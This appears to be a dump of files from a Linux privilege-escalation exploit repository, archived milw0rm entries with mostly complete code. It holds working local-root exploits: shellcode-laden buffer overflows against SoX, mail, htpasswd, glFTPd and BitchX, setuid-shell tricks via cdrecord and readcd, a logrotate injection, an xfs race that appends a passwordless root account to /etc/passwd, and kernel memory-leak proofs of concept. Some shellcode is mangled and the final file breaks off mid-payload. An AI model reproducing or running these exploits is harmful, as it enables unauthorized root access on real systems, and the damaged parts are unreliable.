-------------------------------------------------------------------------------- /linux/linux_exploits/3499.php: -------------------------------------------------------------------------------- 1 | 1, "B" => 1); 33 | 34 | function array_compare(&$key1, &$key2) 35 | { 36 | $GLOBALS['a'] = &$key2; 37 | unset($key2); 38 | return 1; 39 | } 40 | 41 | uksort($arr, "array_compare"); 42 | $x=array($shellcode => 1); 43 | 44 | $a[8*4+0] = $a[6*4+0]; 45 | $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian 46 | $a[8*4+2] = $a[6*4+2]; 47 | $a[8*4+3] = $a[6*4+3]; 48 | 49 | unset($x); 50 | 51 | ?> 52 | 53 | # milw0rm.com [2007-03-16] 54 | -------------------------------------------------------------------------------- /linux/linux_exploits/3571.php: -------------------------------------------------------------------------------- 1 | 42 | 43 | # milw0rm.com [2007-03-25] 44 | -------------------------------------------------------------------------------- /linux/linux_exploits/3595.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define BUFSIZE 0x10000000 10 | 11 | int main(int argc, char *argv[]) 12 | { 13 | void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, 14 | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); 15 | if (mem == (void*)-1) { 16 | printf("Alloc failed\n"); 17 | return -1; 18 | } 19 | /* SOCK_DCCP, IPPROTO_DCCP */ 20 | int s = socket(PF_INET, 6, 33); 21 | if (s == -1) { 22 | fprintf(stderr, "socket failure!\n"); 23 | return 1; 24 | } 25 | /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ 26 | int len = BUFSIZE; 27 | int x = getsockopt(s, 269, 11, mem, &len); 28 | 29 | if (x == -1) 30 | perror("SETSOCKOPT"); 31 | else 32 | printf("SUCCESS\n"); 33 | 34 | write(1, mem, BUFSIZE); 35 | 36 | return 0; 37 | } 38 | 39 | // milw0rm.com [2007-03-28] 40 | -------------------------------------------------------------------------------- 
/linux/linux_exploits/369.pl: -------------------------------------------------------------------------------- 1 | # POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar 2 | # Tested Under Slackware 9.1 3 | # Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org 4 | # Homepage: http://deicide.siyahsapka.org 5 | # Greets to: Virulent 6 | # deicide@gate:~$ play britney.wav 7 | # sh-2.05b$ 8 | 9 | # "jmp %esp" from libc.so , change this if needed.. 10 | retJmpEsp=0x4029824B 11 | 12 | # intel_order() from MOSDEF 13 | def intel_order(myint): 14 | str="" 15 | a=chr(myint % 256) 16 | myint=myint >> 8 17 | b=chr(myint % 256) 18 | myint=myint >> 8 19 | c=chr(myint % 256) 20 | myint=myint >> 8 21 | d=chr(myint % 256) 22 | str+="%c%c%c%c" % (a,b,c,d) 23 | return str 24 | 25 | # Wave Header 26 | begin = "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20" +\ 27 | "\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00" +\ 28 | "\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02" +\ 29 | "\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01" +\ 30 | "\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00" +\ 31 | "\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01" +\ 32 | "\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65" +\ 33 | "\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00" 34 | shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" 35 | 36 | evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode 37 | wavFile = open("britney.wav", "wb") 38 | wavFile.write(evilBuf) 39 | wavFile.close() 40 | print "Evil Song has been created :Pp" 41 | 42 | # milw0rm.com [2004-08-01] 43 | -------------------------------------------------------------------------------- /linux/linux_exploits/3730.txt: -------------------------------------------------------------------------------- 1 | ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow 
Exploit (exec-shield) 2 | 3 | http://www.exploit-db.com/sploits/04132007-pr0ftpd_modctrls.tgz 4 | 5 | # milw0rm.com [2007-04-13] 6 | -------------------------------------------------------------------------------- /linux/linux_exploits/40.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | ############################### 3 | # Mandrake 8.2 /usr/mail local exploit 4 | # 5 | # Usage: 6 | # perl d86mail.pl [offset] 7 | # Then enter "." (dot) and press 'Enter' 8 | # 9 | # Example: 10 | # [satan@localhost my]$ perl d86mail.pl 11 | # eip: 0xbffffddd 12 | # .[enter] 13 | # Cc: too long to edit 14 | # sh-2.05$ 15 | ############################### 16 | 17 | $shellcode = 18 | "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" . 19 | "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" . 20 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . 21 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" . 22 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 23 | $size = 1000; 24 | $size2 = 8204; 25 | $retaddr = 0xbffffddd; 26 | $nop = "\x90"; 27 | $offset = 0; 28 | if (@ARGV == 1) { 29 | $offset = $ARGV[0]; 30 | } 31 | for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) { 32 | $buffer .= $nop; 33 | } 34 | for ($i = 0; $i < ($size2); $i++) { 35 | $buffer2 .= "A"; 36 | } 37 | $buffer .= $shellcode; 38 | print "eip: 0x", sprintf('%lx',($retaddr + $offset)), "\n"; 39 | local($ENV{'EVILBUF'}) = $buffer; 40 | $newret = pack('l', ($retaddr + $offset)); 41 | $buffer2 .= $newret; 42 | exec("mail -s wow -c $buffer2 root@localhost"); 43 | 44 | #EOF 45 | 46 | 47 | # milw0rm.com [2003-06-10] 48 | -------------------------------------------------------------------------------- /linux/linux_exploits/4028.txt: -------------------------------------------------------------------------------- 1 | _ _ _____ _ ___ _____ _ _ 2 | / / / / ____/ / / _/_ __/ / / / 3 | / /_/ / __/ / / / / / / / /_/ / 4 | / __ / /___/ /____/ / / / / __ / 5 | /_/ 
/_/_____/_____/___/ /_/ /_/ /_/ 6 | Helith - 0815 7 | -------------------------------------------------------------------------------- 8 | 9 | Author : Rembrandt 10 | Date : 2007-06-03 11 | Affected Software: screen <= 4.0.3 12 | Affected OS : OpenBSD up to 4.4 (and propably others) 13 | Type : Local Authentication Bypass 14 | 15 | OSVDB : 39587 16 | Milw0rm : 4028 17 | CVE : 2007-3048 18 | ISS X-Force: : 34693 19 | 20 | screen, on some operating systems, is vulnerable to a local terminal screen 21 | lock authentication bypass that may allow physically proximate attackers to 22 | gain access to the system. 23 | 24 | This issue has been confirmed on OpenBSD with screen 4.0.3 on x86/amd64. 25 | The underlying vulnerability may be related to 3rd party authentication such 26 | as PAM. This issue was tested on OpenSuSE with screen 4.0.2 and was not 27 | vulnerable. 28 | 29 | 30 | Steps to reproduce: 31 | 32 | $ screen -S test 33 | [Screened session starts] 34 | $ id 35 | uid=1001(test) gid=1001(test) groups=1001(test) 36 | $ 37 | [type ctrl-a x] 38 | Key: test 39 | Again: test 40 | Screen used by test . 41 | Password: 42 | [type ctrl-c] 43 | $ screen -r 44 | [Regained access to screen, without password] 45 | 46 | The screen lock mechanism is designed to lock a terminal, not the entire shell 47 | session. If an attacker has shell access to the target account, it is understood 48 | they can bypass protection. However, on the system tested, the screen lock 49 | mechanism was bypassed using 'ctrl-c'. 50 | 51 | The vulnerability is not in OpenBSD. screen developers indicate this is known 52 | behavior, but do not appear to fully understand the scenario with which 53 | this can be abused. Replies to my initial disclosure suggest this may be 54 | related to PAM authentication, or another 3rd party package. Testing was 55 | not performed to fully identify the vulnerable code. 
56 | 57 | Tobias Ulmer has committed a patch to the screen code that prevents 58 | this exploit from happening. 59 | 60 | 61 | Kind regards, 62 | Rembrandt 63 | 64 | # milw0rm.com [2008-06-18] 65 | -------------------------------------------------------------------------------- /linux/linux_exploits/4172.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept 3 | * dreyer 07-2007 4 | * Osu, Tatakae, Sexy Pandas! 5 | * 6 | * Dumps to stdout the memory mapped between INI and END. 7 | * 8 | * CVE: CVE-2007-1000 BID: 22904 9 | * 10 | * Affected: Linux Kernel < 2.6.20.2 11 | * 12 | * http://bugzilla.kernel.org/show_bug.cgi?id=8134 13 | * 14 | * Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html 15 | * 16 | * For free!!! ( worth 600 EUR in zerobay! ) 17 | * 18 | */ 19 | 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | 27 | #define HOPOPT_OFFSET 8 28 | #define INIADDR 0xc0100000 29 | #define ENDADDR 0xd0000000 30 | unsigned int i; 31 | 32 | 33 | int main(int argc, char *argv[]) { 34 | int s; 35 | unsigned int optlen; 36 | void *ptr; 37 | char value[10240]; 38 | char text[12]; 39 | 40 | fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n" 41 | "dreyer '07 - free feels better\n" 42 | "Dumping %p - %p to stdout\n",INIADDR,ENDADDR); 43 | 44 | s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); 45 | 46 | /* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */ 47 | setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0); 48 | 49 | /* Make 0x00000000 address valid */ 50 | ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); 51 | 52 | if (ptr != NULL) { 53 | perror("mmap"); 54 | exit(-1); 55 | } 56 | 57 | memset(ptr,0,4096); 58 | 59 | /* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt = 60 | * 0x00000000 + 8 */ 
61 | ptr=(char *)((char *)ptr+HOPOPT_OFFSET); 62 | 63 | i=INIADDR; 64 | while(i0) { 71 | sprintf(text,"\n%08x:",i); 72 | write(1,text,strlen(text)); 73 | write(1,value,optlen); 74 | i=i+optlen; 75 | } else { 76 | /* We could not read this portion because of some error, skip it */ 77 | i=i+4; 78 | } 79 | } 80 | 81 | return 0; 82 | } 83 | 84 | // milw0rm.com [2007-07-10] 85 | -------------------------------------------------------------------------------- /linux/linux_exploits/434.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/434.sh -------------------------------------------------------------------------------- /linux/linux_exploits/438.c: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # cdrecord-suidshell.sh - I)ruid [CAU] (09.2004) 5 | # 6 | # Exploits cdrecord's exec() of $RSH before dropping privs 7 | # 8 | 9 | cat > ./cpbinbash.c << __EOF__ 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | main( int argc, char *argv[] ) { 16 | int fd1, fd2; 17 | int count; 18 | char buffer[1]; 19 | 20 | /* Set ID's */ 21 | setuid( geteuid() ); 22 | setgid( geteuid() ); 23 | 24 | /* Copy the shell */ 25 | if ((fd1=open( "/bin/bash", O_RDONLY))<0) 26 | return -1; 27 | if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0) 28 | return -1; 29 | while((count=read(fd1, buffer, 1))) 30 | write(fd2, buffer, count); 31 | free(buffer); 32 | close( fd1 ); 33 | close( fd2 ); 34 | 35 | /* Priv the shell */ 36 | chown( "./bash", geteuid(), geteuid() ); 37 | chmod( "./bash", 3565 ); 38 | } 39 | __EOF__ 40 | 41 | cc ./cpbinbash.c -o ./cpbinbash 42 | 43 | # Set up environment 44 | export RSHSAVE=$RSH 45 | export RSH=./cpbinbash 46 | 47 | # Sploit 48 | cdrecord dev= REMOTE:CAU:1,0,0 - 49 | 50 | # Cleanup 51 | rm cpbinbash* 52 | export RSH=$RSHSAVE 53 | export RSHSAVE= 54 | 55 | # 
Use our suid bash 56 | ./bash -p 57 | 58 | // milw0rm.com [2004-09-11] 59 | -------------------------------------------------------------------------------- /linux/linux_exploits/466.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Proof Of Concept exploit for htpasswd of Apache. 3 | # Read the advisory for more information. 4 | # - Luiz Fernando Camargo 5 | # - foxtrot_at_flowsecurity.org 6 | $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68". 7 | "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 8 | 9 | 10 | $target = "/usr/local/apache/bin/htpasswd"; 11 | $retaddr = 0xbffffffa - length($shellcode) - length($target); 12 | 13 | 14 | print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n"; 15 | 16 | 17 | local($ENV{'XXX'}) = $shellcode; 18 | $newret = pack('l', $retaddr); 19 | $buffer = "A" x 272; 20 | $buffer .= $newret x 4; 21 | $buffer .= " "; 22 | $buffer .= "B" x 290; 23 | 24 | 25 | exec("$target -nb $buffer"); 26 | 27 | # milw0rm.com [2004-09-16] 28 | -------------------------------------------------------------------------------- /linux/linux_exploits/469.c: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "readcd-exp.sh -- ReadCD local exploit ( Test on cdrecord-2.01-0.a27.2mdk)" 4 | echo "Author : newbug [at] chroot.org" 5 | echo "Date :09.13.2004" 6 | echo "IRC : irc.chroot.org #discuss" 7 | 8 | export READCD=/usr/bin/readcd 9 | cd /tmp 10 | 11 | cat > s.c <<_EOF_ 12 | #include 13 | #include 14 | #include 15 | 16 | int main() 17 | { 18 | setuid(0);setgid(0); 19 | chown("/tmp/ss", 0, 0); 20 | chmod("/tmp/ss", 04755); 21 | 22 | return 0; 23 | } 24 | 25 | _EOF_ 26 | 27 | cat > ss.c <<_EOF_ 28 | #include 29 | 30 | int main() 31 | { 32 | setuid(0);setgid(0); 33 | execl("/bin/bash","bash",(char *)0); 34 | 35 | return 0; 36 | } 37 | _EOF_ 38 | 39 | gcc -o s s.c 40 | gcc -o ss ss.c 41 | 42 | 
export RSH=/tmp/s 43 | $READCD dev=REMOTE:brk.chroot.org:1,0,1 1 >/dev/null 2>&1 44 | /tmp/ss 45 | 46 | 47 | // milw0rm.com [2004-09-19] 48 | -------------------------------------------------------------------------------- /linux/linux_exploits/4698.c: -------------------------------------------------------------------------------- 1 | /* 2 | sing file append exploit 3 | by bannedit 4 | 5 | 12/05/2007 6 | 7 | The original reporter of this issue included an example session which 8 | added an account to the machine. 9 | 10 | The method for this exploit is slightly different and much more 11 | quiet. Although it relies upon logrotate for help. 12 | 13 | This could easily be modified to work with cron daemons which 14 | are not too strict about the cron file format. However, 15 | when I tested vixie cron it appears that there are 16 | better checks for file format compilance these days. 17 | */ 18 | 19 | #include 20 | #include 21 | #include 22 | 23 | #define SING_PATH "/usr/bin/sing" 24 | 25 | char *file = "/etc/logrotate.d/sing"; 26 | char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n"; 27 | 28 | 29 | 30 | int main() 31 | { 32 | FILE *fp; 33 | int pid; 34 | 35 | puts("sing file append exploit"); 36 | puts("------------------------"); 37 | puts("by bannedit"); 38 | 39 | if(fp = fopen("/tmp/shell", "w+")) 40 | { 41 | fputs("#!/bin/bash\n", fp); 42 | fputs("/bin/bash -p", fp); 43 | fclose(fp); 44 | system("touch /tmp/sing; echo garbage >> /tmp/sing"); 45 | } 46 | else 47 | { 48 | puts("error making shell file"); 49 | exit(-1); 50 | } 51 | 52 | sleep(5); 53 | printf("done sleeping...\n"); 54 | execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0); 55 | return 0; 56 | } 57 | 58 | // milw0rm.com [2007-12-06] 59 | -------------------------------------------------------------------------------- /linux/linux_exploits/470.c: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/470.c -------------------------------------------------------------------------------- /linux/linux_exploits/476.c: -------------------------------------------------------------------------------- 1 | /* glFTPd local stack buffer overflow exploit 2 | (Proof of Concept) 3 | 4 | Tested in Slackware 9.0 / 9.1 / 10.0 5 | 6 | by CoKi 7 | No System Group - http://www.nosystem.com.ar 8 | */ 9 | 10 | #include <'stdio.h> 11 | #include <'strings.h> 12 | #include <'unistd.h> 13 | 14 | #define BUFFER 288 + 1 15 | #define PATH "/glftpd/bin/dupescan" 16 | 17 | char shellcode[]= 18 | "xb0x31xcdx80x89xc3x31xc0xb0x17xcdx80" 19 | "x31xdbx31xc0xb0x17xcdx80" 20 | "xebx1fx5ex89x76x08x31xc0x89x46x0cx88x46x07" 21 | "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb" 22 | "x89xd8x40xcdx80xe8xdcxffxffxff/bin/sh"; 23 | 24 | int main(void) { 25 | 26 | char *env[3] = {shellcode, NULL}; 27 | char buf[BUFFER], *path; 28 | int *buffer = (int *) (buf); 29 | int i; 30 | int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH); 31 | 32 | for(i=0; i<=BUFFER; i+=4) 33 | *buffer++ = ret; 34 | 35 | printf(" glFTPd local stack buffer overflow (Proof of Concept) "); 36 | printf(" by CoKi "); 37 | 38 | execle(PATH, "dupescan", buf, NULL, env); 39 | } 40 | 41 | 42 | // milw0rm.com [2004-09-23] 43 | -------------------------------------------------------------------------------- /linux/linux_exploits/5167.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103) 3 | # 4 | # Another lame xploit by vl4dZ :)) works on redhat el5 and before 5 | # 6 | # $ id 7 | # uid=1001(kecos) gid=1001(user) groups=1001(user) 8 | # $ sh xfs-RaceCondition-root-exploit.sh 9 | # [*] Generate large data file in /tmp/.font-unix 10 | # [*] 
Wait for xfs service to be (re)started by root... 11 | # [*] Hop, symlink created... 12 | # [*] Launching root shell 13 | # -sh-3.1# id 14 | # uid=0(root) gid=0(root) groups=0(root) 15 | 16 | # Vulnerable version is xorg-x11-xfs <= 1.0.2-3.1 and vulnerable code is 17 | # located in the start() function of the /etc/init.d/xfs script: 18 | # ... 19 | # rm -rf $FONT_UNIX_DIR 20 | # mkdir $FONT_UNIX_DIR 21 | # chown root:root $FONT_UNIX_DIR 22 | # chmod 1777 $FONT_UNIX_DIR 23 | # ... 24 | 25 | # I'm listening right now to nice free music: 26 | # http://www.jamendo.com/fr/album/5919 27 | 28 | FontDir="/tmp/.font-unix" 29 | Zero=/dev/zero 30 | Size=900000 31 | 32 | if [ ! -d $FontDir ]; then 33 | printf "Is xfs running ?\n" 34 | exit 1 35 | fi 36 | 37 | cd /tmp 38 | cat > sym.c << EOF 39 | #include 40 | int main(){ 41 | for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0) 42 | {return 0;}}} 43 | EOF 44 | 45 | cc sym.c -o sym>/dev/null 2>&1 46 | if [ $? != 0 ]; then 47 | printf "Error: Cant compile code" 48 | exit 1 49 | fi 50 | 51 | printf "[*] Generate large data file in $FontDir\n" 52 | dd if=${Zero} of=${FontDir}/BigFile bs=1024 count=${Size}>/dev/null 2>&1 53 | if [ $? != 0 ]; then 54 | printf "Error: cant create large file" 55 | exit 1 56 | fi 57 | 58 | printf "[*] Wait for xfs service to be (re)started by root...\n" 59 | ./sym 60 | if [ $? != 0 ]; then 61 | printf "Error: code failed...\n" 62 | exit 1 63 | fi 64 | 65 | if [ -L /tmp/.font-unix ]; then 66 | printf "[*] Hop, symlink created...\n" 67 | printf "[*] Launching root shell\n" 68 | sleep 2 69 | rm -f /tmp/.font-unix 70 | echo "r00t::0:0::/:/bin/sh" >> /etc/passwd 71 | fi 72 | su - r00t 73 | 74 | # milw0rm.com [2008-02-21] 75 | -------------------------------------------------------------------------------- /linux/linux_exploits/5424.txt: -------------------------------------------------------------------------------- 1 | I have released this exploit for the alsaplayer bug CVE-2007-5301. 
2 | 3 | You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/ 4 | 5 | With my modified version of vorbiscomment, you can generate a ogg exploit like this: 6 | 7 | whats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA 8 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 9 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 11 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 12 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 15 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 16 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 17 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 19 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 20 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 21 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 22 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 23 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 24 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 25 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 26 | 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\x77\xe7 27 | \xff\xff\x08\x08\x08\x08\x29\xc9\x83\xe9\xf4\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e 28 | \x46\x90\xbe\x13\x83\xee\xfc\xe2\xf4\x2c\x9b\xe6\x8a\x14\xf6\xd6\x3e\x25\x19\x59\x7b 29 | \x69\xe3\xd6\x13\x2e\xbf\xdc\x7a\x28\x19\x5d\x41\xae\x9c\xbe\x13\x46\xbf\xcb\x60\x34 30 | \xbf\xdc\x7a\x28\xbf\xd7\x77\x46\xc7\xed\x9a\xa7\x5d\x3e\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg 31 | 32 | Then, if you plays the file with the vulnerable version: 33 | 34 | whats@debian:~$ alsaplayer exploit.ogg 35 | uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats) 36 | 37 | This was tested with the debian etch packages. 38 | 39 | - whats 40 | 41 | # milw0rm.com [2008-04-10] 42 | -------------------------------------------------------------------------------- /linux/linux_exploits/586.c: -------------------------------------------------------------------------------- 1 | // BitchX local-root by Sha0 (version 1.0c19 e inferiores -todas-) 2 | // este exploit se lo dedico a mi chica. 
3 | // 0xC0000000-4-strlen(argv[1])-1-strlen(buffer) 4 | // 2052 to the ret 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | char payload[69]; 12 | char sha0code[] = 13 | "\xeb\x16\x5b\x31\xc0" 14 | "\x50\x53\xb0\x0b\x89" 15 | "\xdb\x89\xe1\x31\xd2" 16 | "\xcd\x80\x31\xc0\x40" 17 | "\x31\xdb\xcd\x80\xe8" 18 | "\xe5\xff\xff\xff\x2f" 19 | "\x62\x69\x6e\x2f\x73\x68"; 20 | 21 | 22 | void nopea (void); 23 | 24 | int main (int argc, char **argv) { 25 | 26 | char *buff; 27 | char *arg1="bash"; 28 | char *arg2="-c"; 29 | char *arg[]={arg1,arg2,buff,NULL}; 30 | char *env[]={"TERM=xterm",payload,NULL}; 31 | char offset[]=""; 32 | char sret[4]; 33 | unsigned long lret; 34 | int i; 35 | 36 | if (argc != 2) { 37 | fprintf (stdout,"BitchX exploit Coded By Sha0\n"); 38 | fprintf (stdout,"ej: %s /usr/bin/BitchX\n\n",argv[0]); 39 | return (1); 40 | } 41 | 42 | buff = (char *)malloc (2100); 43 | bzero (buff,sizeof(buff)); 44 | arg[2] = buff; 45 | 46 | nopea (); 47 | 48 | lret = 0xbffffffa - strlen(payload) - strlen(argv[1]); 49 | sret[0] = (0x000000ff & lret); 50 | sret[1] = (0x0000ff00 & lret) >> 8; 51 | sret[2] = (0x00ff0000 & lret) >> 16; 52 | sret[3] = (0xff000000 & lret) >> 24; 53 | 54 | for (i=0;i<2088;i+=4) // 2088 tirando largo. 
55 | memcpy (buff+i,sret,4); 56 | 57 | execve (argv[1],arg,env); 58 | perror ("execve()"); 59 | 60 | free (buff); 61 | return (0); 62 | } 63 | 64 | 65 | void nopea (void) { 66 | bzero (payload,sizeof(payload)); 67 | memset (payload,0x90,sizeof(payload)-1); 68 | memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code)); 69 | } 70 | 71 | // milw0rm.com [2004-10-20] 72 | -------------------------------------------------------------------------------- /linux/linux_exploits/591.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/591.c -------------------------------------------------------------------------------- /linux/linux_exploits/601.c: -------------------------------------------------------------------------------- 1 | /* 2 | * libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom 3 | * 4 | * [n00b localho outernet] gcc -Wall libsuxml.c -lxml2 5 | * [n00b localho outernet] ./a.out 6 | * Usage: ./a.out [ align ] 7 | * [n00b localho outernet] netstat -ant | grep 7000 8 | * [n00b localho outernet] ./a.out 0xbfff0360 9 | * xmlNanoFTPScanURL: Use [IPv6]/IPv4 format 10 | * [n00b localho outernet] netstat -ant | grep 7000 11 | * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN 12 | 13 | * 14 | */ 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | #define die(x) do{ perror((x)); exit(1); }while(0) 25 | #define BS 0x10000 26 | #define NOP 0x90 27 | #define NNOPS 3000 28 | #define ALIGN 0 29 | 30 | /* call them */ 31 | #define SHELL_LEN (sizeof(sc)-1) 32 | char sc[] = 33 | "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6" 34 | "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50" 35 | "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a" 36 | 
